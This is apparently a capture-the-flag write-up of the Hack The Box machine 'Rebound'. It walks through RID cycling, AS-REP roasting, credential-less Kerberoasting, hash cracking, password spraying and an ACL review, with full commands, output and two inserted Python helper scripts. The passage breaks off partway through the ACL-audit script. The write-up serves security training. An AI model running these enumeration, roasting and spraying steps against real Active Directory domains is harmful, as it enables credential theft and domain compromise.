htb-rebound

Rebound is a hard Active Directory / Kerberos box.

I’ll start off with a RID-cycle attack to get a list of users, and combine AS-REP-Roasting with Kerberoasting to get a crackable hash for a service account.

That password is shared by a domain user, and I’ll find a bad ACL that allows that user control over an important group. With access to that group, I can change the password of or get a shadow credential for another user with WinRM access.

I’ll perform a cross-session relay attack with both RemotePotato and KrbRelay to get a hash for the next user, who can read the GMSA password for another service account. This account is configured for constrained delegation, and I’ll need to abuse both that delegation and RBCD to get a ticket as the DC machine account, and dump hashes for the domain. This one is heavy on Active Directory and Kerberos!

HTB Rebound

nmap

nmap -p- --min-rate 10000 10.10.11.231
Starting Nmap 7.93 ( https://nmap.org ) at 2024-12-06 09:07 CET
Nmap scan report for 10.10.11.231
Host is up (0.013s latency).
Not shown: 65509 closed tcp ports (conn-refused)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49673/tcp open  unknown
49690/tcp open  unknown
49691/tcp open  unknown
49692/tcp open  unknown
49697/tcp open  unknown
49718/tcp open  unknown
49727/tcp open  unknown
49800/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 7.29 seconds

nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -sV -o rebound.nmap 10.10.11.231
Nmap scan report for 10.10.11.231
Host is up (0.015s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-06 15:11:07Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Dec  6 09:11:46 2024 -- 1 IP address (1 host up) scanned in 45.46 seconds

This is a Windows Domain Controller.

I will add the hosts to my /etc/hosts file:

10.10.11.231 dc01 rebound.htb dc01.rebound.htb

Having dc01 in there will prove important later.

SMB – TCP 445

Host Enumeration

netexec shows the same thing as the nmap output:

nxc smb 10.10.11.231 
SMB         10.10.11.231    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)

Shares

The guest user is able to list shares:

nxc smb 10.10.11.231 -u guest -p '' --shares 
SMB         10.10.11.231    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.231    445    DC01             [+] rebound.htb\guest: 
SMB         10.10.11.231    445    DC01             [*] Enumerated shares
SMB         10.10.11.231    445    DC01             Share           Permissions     Remark
SMB         10.10.11.231    445    DC01             -----           -----------     ------
SMB         10.10.11.231    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.231    445    DC01             C$                              Default share
SMB         10.10.11.231    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.231    445    DC01             NETLOGON                        Logon server share 
SMB         10.10.11.231    445    DC01             Shared          READ            
SMB         10.10.11.231    445    DC01             SYSVOL                          Logon server share 

These are the standard shares on a DC, plus Shared.

There are no files found that can be accessed with a null auth.

User Enumeration

I’ll perform a RID Cycling attack to enumerate users:

nxc smb 10.10.11.231 -u guest -p '' --rid-brute 
SMB         10.10.11.231    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.231    445    DC01             [+] rebound.htb\guest: 
SMB         10.10.11.231    445    DC01             498: rebound\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.231    445    DC01             500: rebound\Administrator (SidTypeUser)
--snip--
SMB         10.10.11.231    445    DC01             3382: rebound\fflock (SidTypeUser)

By default, typical RID cycle attacks go up to RID 4000. For a larger domain, it may be necessary to expand that, so I’ll switch to lookupsid.py (though netexec works as well by adding the max number to the option like --rid-brute 10000). Trying 10,000 does find more users (I don’t find any above 8,000):

impacket-lookupsid -no-pass 'guest@rebound.htb' 20000 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Brute forcing SIDs at rebound.htb
[*] StringBinding ncacn_np:rebound.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4078382237-1492182817-2568127209
498: rebound\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: rebound\Administrator (SidTypeUser)
--snip--
7687: rebound\delegator$ (SidTypeUser)

I’ll run that again to make a users list:

impacket-lookupsid -no-pass 'guest@rebound.htb' 8000 | grep SidTypeUser | cut -d' ' -f2 | cut -d'\' -f2 | tee users
Administrator
Guest
krbtgt
DC01$
ppaul
llune
fflock
jjones
mmalone
nnoon
ldap_monitor
oorend
winrm_svc
batch_runner
tbrady
delegator$

Auth as ldap_monitor

AS-Rep-Roast

Without creds, I can look for users that have the DONT_REQUIRE_PREAUTH flag set using the Impacket script GetNPUsers.py. It finds one:

impacket-GetNPUsers -usersfile users rebound.htb/ -dc-ip 10.10.11.231 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User DC01$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ppaul doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User llune doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fflock doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$jjones@REBOUND.HTB:0628fadfb01a85aa9180ab2109a1cfac$9a123a09e093d37762a7ef5ae825c0cab83ded5ce7e37c1799d4d8c2ef703666ec462a3bd2abed5e922b2eedb3f1bf9c1132650a3b5f71bee26034beca795a9099d8b883f359b140ef9f36d857a45221704e6204ba88f308301a75b1ece4b9078a75551295af41817b629dfe567302acc848aada6885ff7a810861fd7243f95f89fefa22b993b41aa74b0d95ec733752ea688cb03a34449cbab40a024c9a396546b987f4a933de2e2f0a33c53a6cad43db2734ec4707db82b63aae1c78e1feaa38c476c861b5edb50ee31a9a1359af411c4b618d36c90ecd444b6c4d976bc7980eb169b9a6b94a404ccc
[-] User mmalone doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User nnoon doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ldap_monitor doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User oorend doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User winrm_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User batch_runner doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User tbrady doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User delegator$ doesn't have UF_DONT_REQUIRE_PREAUTH set

netexec can do this as well:

nxc ldap 10.10.11.231 -u users -p '' --asreproast asrephashes.txt 
SMB         10.10.11.231    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
LDAP        10.10.11.231    445    DC01             $krb5asrep$23$jjones@REBOUND.HTB:e92d3f8cccf553687653d4266eba36e1$6bc95311e1d5a6a0d28868a810802414fc82c4f39fde09db6a9a0190e88ae1026bec5a84551158ede8acb5ded440b32e7949afb18a45b3d8fbbcf29d280968a87e154ff24739cf436c5ae47c14046f8bc6febe42f0a698f27b045c21ecbe63b695237e8436b6a1a8f97e3a104ff65d9116c35db72ac7c7b596e84afd9ff11b8bd994f08715345a5fe4073551935a4311c1fc2baaa5009270fc7de701d0e09de7c4069f30964ceec1bc7ae465bce006c31b78b3d7304703811b93daf2751325d3444fce48eca4e0315d483507ae2d1a9bb4e8831d840b9f37bf8485a543b22aab0dee46a658d2aec09988

It saves the hashes to the specified output file, in this case asrephashes.txt.

I’ll take this over to hashcat and try to crack it, but it doesn’t crack on rockyou.txt, which means it’s likely not meant to be cracked.

Kerberoast

Strategy

Typically I think of Kerberoasting as something I can do once I have at least one domain user’s creds. But this research from Charlie Clark in Sept 2022 showed that it is possible to abuse a user with DONT_REQUIRE_PREAUTH to Kerberoast other users. The post summarizes:

Therefore, if any account is configured to not require pre-authentication, it is possible to Kerberoast without any credentials. This method of Kerberoasting has been implemented in Rubeus within this PR.

It’s also implemented in GetUserSPNs.py from this commit, though I had to install it from GitHub rather than PyPI to get it working (pipx install git+https://github.com/fortra/impacket).

Get Hashes

To Kerberoast this way (ASPERKerberoast?), I’ll use the -no-preauth flag, giving it the account that does not require preauth, jjones, as well as the -usersfile, the -dc-host, and the domain:

impacket-GetUserSPNs -no-preauth jjones -usersfile users -dc-host 10.10.11.231 rebound.htb/
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] Principal: Administrator - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Guest - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$18$krbtgt$REBOUND.HTB$*krbtgt*$27--snip--45
$krb5tgs$18$DC01$$REBOUND.HTB$*DC01$*$16--snip--c3
[-] Principal: ppaul - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: llune - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: fflock - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: jjones - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: mmalone - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: nnoon - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$23$*ldap_monitor$REBOUND.HTB$ldap_monitor*$61227a1eab1fc7fa459a3fce20ede19f$--snip--
[-] Principal: oorend - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: winrm_svc - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: batch_runner - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: tbrady - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$18$delegator$$REBOUND.HTB$*delegator$*$b8fca731837081c3f01bf293$--snip--

It finds hashes for several accounts. I’ll save these to a file:

impacket-GetUserSPNs -no-preauth jjones -usersfile users -dc-host 10.10.11.231 rebound.htb/ | grep '^\$krb' > kerberoasting_hashes 

Crack

Without trying, I think it will be very unlikely that the krbtgt, DC01$, or delegator$ accounts will crack. Those are all machine accounts or otherwise internally managed accounts, and likely to have a long complex password. I’ll start with ldap_monitor:
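Before feeding anything to hashcat, it helps to triage the roasted hashes mechanically. The Python below is an added example, not part of the original writeup: it parses the hashcat-style lines that GetNPUsers.py and GetUserSPNs.py print, copes with account names that themselves contain `$` (DC01$, delegator$), maps each line to its hashcat mode, and deprioritizes machine and krbtgt accounts for the reason given above. The sample lines are constructed with dummy hex, not the box's real hashes.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Hashcat-style lines as printed by GetNPUsers.py and GetUserSPNs.py. Account
# names may themselves contain '$' (DC01$, delegator$), so the fields are
# matched by each format's fixed delimiters rather than by splitting on '$'.
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>23)\$(?P<user>.+?)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-f]{32})\$(?P<edata>[0-9a-f]+)$"
)
TGS_RC4_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>23)\$\*(?P<user>.+?)\$(?P<realm>[^$*]+)\$(?P<spn>.*?)\*\$"
    r"(?P<checksum>[0-9a-f]{32})\$(?P<edata>[0-9a-f]+)$"
)
TGS_AES_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>17|18)\$(?P<user>.+?)\$(?P<realm>[^$*]+)\$\*(?P<spn>.+?)\*\$"
    r"(?P<checksum>[0-9a-f]{24})\$(?P<edata>[0-9a-f]+)$"
)
FORMATS = (("asrep", ASREP_RE), ("tgs", TGS_RC4_RE), ("tgs", TGS_AES_RE))

# hashcat -m values for each (kind, etype); hashcat takes one mode per run.
HASHCAT_MODES = {("asrep", 23): 18200, ("tgs", 23): 13100,
                 ("tgs", 17): 19600, ("tgs", 18): 19700}


@dataclass
class RoastedHash:
    kind: str            # "asrep" or "tgs"
    etype: int
    user: str
    realm: str
    spn: Optional[str]   # only present in TGS-REP lines
    mode: Optional[int]
    line: str

    @property
    def is_machine_or_krbtgt(self) -> bool:
        return self.user.endswith("$") or self.user.lower() == "krbtgt"

    @property
    def crack_priority(self) -> str:
        # Machine accounts and krbtgt carry long random passwords: not worth GPU
        # time. Among the rest, RC4 (etype 23) is far cheaper to attack than AES.
        if self.is_machine_or_krbtgt:
            return "skip"
        return "high" if self.etype == 23 else "low"


def parse_hash(line: str) -> Optional[RoastedHash]:
    """Parse one output line; returns None for status and error lines."""
    line = line.strip()
    for kind, regex in FORMATS:
        m = regex.match(line)
        if m:
            etype = int(m.group("etype"))
            return RoastedHash(kind, etype, m.group("user"), m.group("realm"),
                               m.groupdict().get("spn"), HASHCAT_MODES.get((kind, etype)), line)
    return None


def triage(lines: List[str]) -> List[RoastedHash]:
    """Keep only parsable hash lines, best cracking candidates first."""
    order = {"high": 0, "low": 1, "skip": 2}
    hashes = [h for h in (parse_hash(l) for l in lines) if h]
    return sorted(hashes, key=lambda h: order[h.crack_priority])


def group_by_mode(hashes: List[RoastedHash]) -> Dict[int, List[str]]:
    """Bucket hash lines by hashcat mode so each bucket can go to one run."""
    buckets: Dict[int, List[str]] = {}
    for h in hashes:
        if h.mode is not None:
            buckets.setdefault(h.mode, []).append(h.line)
    return buckets


# Constructed sample output: real line structure, dummy hex (not the box's hashes).
SAMPLE_OUTPUT = [
    "$krb5asrep$23$jjones@REBOUND.HTB:" + "11" * 16 + "$" + "22" * 48,
    "$krb5tgs$18$krbtgt$REBOUND.HTB$*krbtgt*$" + "33" * 12 + "$" + "44" * 48,
    "$krb5tgs$18$DC01$$REBOUND.HTB$*DC01$*$" + "55" * 12 + "$" + "66" * 48,
    "$krb5tgs$23$*ldap_monitor$REBOUND.HTB$ldap_monitor*$" + "77" * 16 + "$" + "88" * 48,
    "$krb5tgs$18$delegator$$REBOUND.HTB$*delegator$*$" + "99" * 12 + "$" + "aa" * 48,
    "[-] Principal: ppaul - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)",
]

if __name__ == "__main__":
    for h in triage(SAMPLE_OUTPUT):
        print(f"{h.crack_priority:5} {h.kind}/etype{h.etype} -m {h.mode} {h.user}@{h.realm}")
```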

puck@hkali$ cat kerberoasting_hashes | grep ldap_monitor > ldap_monitor_hash

This hash cracks very quickly:

hashcat ldap_monitor_hash /usr/share/wordlists/rockyou.txt  
hashcat (v6.2.6) starting in autodetect mode

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$krb5tgs$23$*ldap_monitor$REBOUND.HTB$ldap_monitor*$3e--snip--d60:1GR8t@$$4u
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*ldap_monitor$REBOUND.HTB$ldap_monitor*...96cd60

The others don’t crack with rockyou.txt.

Test Creds

These creds work for SMB, but not LDAP:

nxc ldap rebound.htb -u ldap_monitor -p '1GR8t@$$4u' 
SMB         10.10.11.231    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.231    636    DC01             [-] rebound.htb\ldap_monitor:1GR8t@$$4u 
LDAPS       10.10.11.231    636    DC01             [-] LDAPS channel binding might be enabled, this is only supported with kerberos authentication. Try using '-k'.

The LDAP failure is weird. Typically, any domain user can at least connect to LDAP. It turns out that the host is configured with the LDAP Channel Binding Policy set to Always, which is designed to prevent NTLM relay attacks (see this neat video).

If I try netexec again with the -k flag to force Kerberos, it does work (after fixing the clock skew with ntpdate):

netexec ldap rebound.htb -u ldap_monitor -p '1GR8t@$$4u' -k
SMB         rebound.htb     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
LDAP        rebound.htb     389    DC01             [-] rebound.htb\ldap_monitor:1GR8t@$$4u KRB_AP_ERR_SKEW
                                                                                                                     
sudo ntpdate rebound.htb      
2024-12-06 17:51:09.244487 (+0100) +25200.329485 +/- 0.009144 rebound.htb 10.10.11.231 s1 no-leap
CLOCK: time stepped by 25200.329485
                                                                                                                     
netexec ldap rebound.htb -u ldap_monitor -p '1GR8t@$$4u' -k
SMB         rebound.htb     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
LDAPS       rebound.htb     636    DC01             [+] rebound.htb\ldap_monitor 

At this point, with legit creds, there’s a lot I can collect, but I’ll save it for the next step when it’s most useful.

Auth as OOrend

Password Spray

Given that ldap_monitor seems like a shared account, I’ll check to see if the password is reused with any other users. I’ll need the --continue-on-success flag to keep going after verifying the password works for ldap_monitor:

nxc smb rebound.htb -u users -p '1GR8t@$$4u' --continue-on-success 
SMB         10.10.11.231    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.231    445    DC01             [-] rebound.htb\Administrator:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         10.10.11.231    445    DC01             [-] rebound.htb\Guest:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         10.10.11.231    445    DC01             [-] rebound.htb\krbtgt:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         10.10.11.231    445    DC01             [-] rebound.htb\DC01$:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         10.10.11.231    445    DC01             [-] rebound.htb\ppaul:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         10.10.11.231    445    DC01             [-] rebound.htb\llune:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         10.10.11.231    445    DC01             [-] rebound.htb\fflock:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         10.10.11.231    445    DC01             [-] rebound.htb\jjones:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         10.10.11.231    445    DC01             [-] rebound.htb\mmalone:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         10.10.11.231    445    DC01             [-] rebound.htb\nnoon:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         10.10.11.231    445    DC01             [+] rebound.htb\ldap_monitor:1GR8t@$$4u 
SMB         10.10.11.231    445    DC01             [+] rebound.htb\oorend:1GR8t@$$4u 
SMB         10.10.11.231    445    DC01             [-] rebound.htb\winrm_svc:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         10.10.11.231    445    DC01             [-] rebound.htb\batch_runner:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         10.10.11.231    445    DC01             [-] rebound.htb\tbrady:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         10.10.11.231    445    DC01             [-] rebound.htb\delegator$:1GR8t@$$4u STATUS_LOGON_FAILURE

oorend uses the same password!

Validate Creds

Still no WinRM, and the same thing happens with LDAP:

nxc ldap rebound.htb -u oorend -p '1GR8t@$$4u' -k
SMB         rebound.htb     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
LDAPS       rebound.htb     636    DC01             [+] rebound.htb\oorend 
                                                                                                                     
┌──(puck㉿kali)-[~/htb/rebound]
└─$ nxc winrm rebound.htb -u oorend -p '1GR8t@$$4u' -k 
WINRM       rebound.htb     5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:rebound.htb)

Shell as WinRM_svc

Enumeration

Collect Bloodhound

With access to two users, I can pull Bloodhound data with either of them:

I’ll tailor the collection query (-c) to exclude ObjectProps, as it seemingly causes the bloodhound-python tool to fail.

bloodhound-python -u ldap_monitor -p '1GR8t@$$4u' -d rebound.htb -dc dc01.rebound.htb --zip -c Group,LocalAdmin,RDP,DCOM,Container,PSRemote,Session,Acl,Trusts,LoggedOn -ns 10.10.11.231
INFO: Found AD domain: rebound.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.rebound.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.rebound.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 16 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.rebound.htb
INFO: User with SID S-1-5-21-4078382237-1492182817-2568127209-7686 is logged in on dc01.rebound.htb
INFO: Done in 00M 07S
INFO: Compressing output into 20241206181254_bloodhound.zip

Bloodhound Analysis

It turns out that the version of Bloodhound Python that was out when Rebound released didn’t collect the data necessary for the next step. I’ll show that version here, as well as the latest version at the end.

Bloodhound doesn’t show any kind of outbound control from either ldap_monitor or oorend. Typically this is where I move to other stuff, but without much else, I’ll look around at what interesting targets there might be. The “Shortest Paths to High Value Targets” query shows this spaghetti:

The top right of the chart jumps out as interesting. Two users in the ServiceMgmt group, which has GenericAll on Service Users, which contains WinRm_SVC. WinRm_SVC can also PsRemote into the DC, which is something I probably need.

ACL Analysis

powerview.py is a neat tool for doing deeper analysis of Windows object properties remotely. It’s based on the no-longer-maintained powerview.ps1 (still available here).

Without -k, it won’t connect (just like above), but on adding it, it does:

I installed it in a Python virtual environment:

python3 -m venv venv 
source venv/bin/activate
git clone https://github.com/aniqfakhrul/powerview.py
cd powerview.py  
                                                                                                             
┌──(venv)─(puck㉿kali)-[~/htb/rebound/powerview.py]
└─$ sudo apt install libkrb5-dev
└─$ bash install.sh 
┌──(venv)─(puck㉿kali)-[~/htb/rebound/powerview.py]
└─$ powerview rebound.htb/oorend:'1GR8t@$$4u'@rebound.htb
Logging directory is set to /home/puck/.powerview/logs/rebound-oorend-rebound.htb
[2024-12-06 18:26:33] Channel binding is enforced!
(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > 

From the PV > prompt, I can run typical PowerView commands. When I get to looking at the ACL on the ServiceMGMT group, there’s an interesting entry:

powerview rebound.htb/oorend:'1GR8t@$$4u'@rebound.htb
Logging directory is set to /home/puck/.powerview/logs/rebound-oorend-rebound.htb
[2024-12-06 18:26:33] Channel binding is enforced!
(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > Get-DomainObjectAcl -Identity ServiceMGMT
ObjectDN                    : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
ObjectSID                   : S-1-5-21-4078382237-1492182817-2568127209-7683
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : None
AccessMask                  : ReadProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT
ObjectAceType               : 46a9b11d-60ae-405a-b7e8-ff8a58d456d2
InheritanceType             : None
SecurityIdentifier          : BUILTIN\Windows Authorization Access Group (S-1-5-32-560)

ObjectDN                    : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
ObjectSID                   : S-1-5-21-4078382237-1492182817-2568127209-7683
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : None
AccessMask                  : ControlAccess
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT
ObjectAceType               : ab721a55-1e2f-11d0-9819-00aa0040529b
InheritanceType             : None
SecurityIdentifier          : Authenticated Users (S-1-5-11)

ObjectDN                    : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
ObjectSID                   : S-1-5-21-4078382237-1492182817-2568127209-7683
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : None
ActiveDirectoryRights       : Self
AccessMask                  : 0x8
InheritanceType             : None
SecurityIdentifier          : oorend (S-1-5-21-4078382237-1492182817-2568127209-7682)

--snip--

(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > 

oorend has Self rights over this group, which means they can add themselves to it.
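Reading raw ACEs like the ones above is error-prone by eye, so here is a small audit script, added as an example and not part of the original writeup. It parses the powerview.py `Get-DomainObjectAcl` output format, decodes the raw AccessMask bits (0x8 is the Self validated-write right shown above; 0xf01ff is the GenericAll composite), and flags allow-ACEs that hand write rights to a trustee outside the usual privileged set. The sample ACL text is constructed from the entries shown on this page; the object-type GUIDs are reported but not resolved to names, since that needs a schema lookup.

```python
import re
from typing import Dict, List

# ADS_RIGHTS_ENUM bits as they appear in an AD ACE access mask.
AD_RIGHTS = {
    0x1: "CreateChild", 0x2: "DeleteChild", 0x4: "ListChildren",
    0x8: "Self",              # validated write; on a group: add yourself as a member
    0x10: "ReadProperty", 0x20: "WriteProperty", 0x40: "DeleteTree", 0x80: "ListObject",
    0x100: "ExtendedRight",   # powerview.py prints this as ControlAccess
    0x10000: "Delete", 0x20000: "ReadControl", 0x40000: "WriteDacl", 0x80000: "WriteOwner",
}
GENERIC_ALL = 0x000F01FF  # .NET ActiveDirectoryRights.GenericAll, shown as FullControl
NAME_TO_MASK = {name: bit for bit, name in AD_RIGHTS.items()}
NAME_TO_MASK.update({"ControlAccess": 0x100, "GenericAll": GENERIC_ALL, "FullControl": GENERIC_ALL})

# Rights that let a trustee change the object or its security descriptor.
ABUSABLE = {"GenericAll", "WriteDacl", "WriteOwner", "WriteProperty", "Self", "ExtendedRight"}
# Trustees expected to hold broad rights everywhere; skipped to cut noise.
EXPECTED_TRUSTEES = ("BUILTIN\\", "NT AUTHORITY\\SYSTEM", "Domain Admins", "Enterprise Admins")


def decode_mask(mask: int) -> List[str]:
    """Raw access mask -> right names; the GenericAll composite wins outright."""
    if mask & GENERIC_ALL == GENERIC_ALL:
        return ["GenericAll"]
    return [name for bit, name in AD_RIGHTS.items() if mask & bit]


def mask_from_text(text: str) -> int:
    """powerview.py shows AccessMask as hex (0xf01ff) or as names (ReadProperty)."""
    text = text.strip()
    if text.lower().startswith("0x"):
        return int(text, 16)
    return sum(NAME_TO_MASK.get(n.strip(), 0) for n in text.split(","))


def parse_powerview_acl(text: str) -> List[Dict[str, str]]:
    """Split Get-DomainObjectAcl output into one 'Key : Value' dict per ACE."""
    aces = []
    for block in re.split(r"\n\s*\n", text.strip()):
        ace: Dict[str, str] = {}
        for line in block.splitlines():
            key, sep, value = line.partition(":")
            if sep:
                ace[key.strip()] = value.strip()
        if "ObjectDN" in ace and "AccessMask" in ace:
            aces.append(ace)
    return aces


def audit(text: str) -> List[Dict[str, object]]:
    """Report allow-ACEs that grant an abusable right to an unexpected trustee."""
    findings: List[Dict[str, object]] = []
    for ace in parse_powerview_acl(text):
        trustee = ace.get("SecurityIdentifier", "")
        if not ace.get("ACEType", "").startswith("ACCESS_ALLOWED"):
            continue
        if any(p in trustee for p in EXPECTED_TRUSTEES):
            continue
        hits = [r for r in decode_mask(mask_from_text(ace["AccessMask"])) if r in ABUSABLE]
        if not hits:
            continue
        # An ObjectAceType GUID narrows WriteProperty/ExtendedRight to one attribute
        # or control right rather than the whole object; resolve it before judging.
        scoped = ace.get("ObjectAceType", "")
        findings.append({"object": ace["ObjectDN"], "trustee": trustee, "rights": ",".join(hits),
                         "scoped_to": scoped, "inherited": "INHERITED_ACE" in ace.get("ACEFlags", "")})
    return findings


# Constructed sample: the ACEs shown in the powerview output above, trimmed.
SAMPLE_ACL = """\
ObjectDN           : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
ACEType            : ACCESS_ALLOWED_OBJECT_ACE
AccessMask         : ReadProperty
ObjectAceType      : 46a9b11d-60ae-405a-b7e8-ff8a58d456d2
SecurityIdentifier : BUILTIN\\Windows Authorization Access Group (S-1-5-32-560)

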